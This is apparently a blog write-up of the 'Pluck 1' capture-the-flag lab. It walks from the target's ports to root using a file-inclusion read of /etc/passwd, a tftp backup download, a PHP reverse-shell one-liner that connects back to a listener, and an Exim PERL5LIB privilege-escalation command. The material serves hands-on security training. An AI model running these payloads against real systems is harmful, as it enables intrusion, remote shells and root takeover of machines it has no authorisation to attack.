Wednesday, March 15, 2017

Pluck 1 CTF

Love this challenge :)
The main point I think, is to pay attention to details. It is most important.

Ok let's start:

Nmap scan report for 172.16.3.4
Host is up (0.00099s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:01:7F:D6 (VMware)

In web application we find straitforward LFI:
http://10.0.0.1/index.php?page=/etc/passwd

Shows us two interesting rows:

paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu (next challenge?)
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Let's see backup.sh script:
http://172.16.3.4/index.php?page=/usr/local/scripts/backup.sh

#Backup directories in /backups so we can get it via tftp

echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null

Seems that tftp server running.
tftp> get backup.tar
Received 1824718 bytes in 0.3 seconds
tftp> exit

tar xvf backup.tar
Digging in backups...
admin.php is sql injection trolling so there is no sql injection

/home/paul/keys/ : a lot of private/public keys pairs found

working key:
ssh -i id_key4 paul@pluck

In all options, arbitrary command can be executed via $(id).
Using php reverse shell one liner:
$(php -r '$sock=fsockopen("10.0.0.1",80);exec("/bin/sh -i <&3 >&3 2>&3");')
and listener:
nc -lvp 80
Listening on [0.0.0.0] (family 0, port 80)
Connection from [10.0.0.1] port 80 [tcp/http] accepted (family 2, sport 53278)
$ id
uid=1002(paul) gid=1002(paul) groups=1002(paul)
Finding for SUID files:
find / -perm -4000 -ls 2>/dev/null

Reveal us a vulnerable Exim application:
   153966   1024 -rwsr-xr-x   1 root     root      1046368 Jan 18 08:54 /usr/exim/bin/exim-4.84-7

Exploit is very simple and trivial to use, also you may find a hint in .viminfo file
Seems to be Exim local privilege escalation testing and the author forgot to clean it properly :)
-'  1  0  /tmp/asdf.pm
-'  4  0  /tmp/test.pm
Let's try:
exploit-database: 39535
...snip
$ PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
id
uid=0(root) gid=1002(paul) groups=1002(paul)
$ cd /root
$ ls
flag.txt
$ cat flag.txt

Congratulations you found the flag

---------------------------------------

######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########                     
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########                    
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Cool :)
Uptime: 45 min

No comments:

Post a Comment